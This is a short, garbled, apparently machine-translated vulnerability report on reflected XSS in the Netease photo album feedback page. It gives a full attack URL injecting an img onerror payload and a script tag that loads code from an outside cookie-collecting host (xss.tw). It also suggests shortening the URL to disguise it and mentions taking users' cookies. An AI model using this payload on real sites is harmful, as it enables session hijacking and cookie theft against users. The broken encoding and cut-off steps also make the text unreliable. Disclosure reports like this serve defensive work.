Netease photo album users' feedback is reflected in xss, so users can easily get their cookies. I have already submitted this document. I am hereby submitting the document because I have not provided any proof of case... Bytes
1. In the feedback area of Netease album users, ask a question and access your own questions. The content of the questions is not filtered here, resulting in xss. The constructed url is as follows: http://fankui.163.com/ft/question.fb? Pid = 3 & cid = 33518918 & type = 0 & pno = 1% 22% 3E % 3 Cimg % 20src = 1% 20 onerror = % 22 alert % 28/xss/% 29% 22% 3E % 3 Cscript % 20src = http://xss.tw/762%3Ealert%281%29%3C/script%3E there are two xss, starting point, you can also see from the page source code 2. Because the constructed url is too long, you can use shorten url: Plain. If you do not know which user the cookie is, log on to the system as follows:
Solution:
Filter!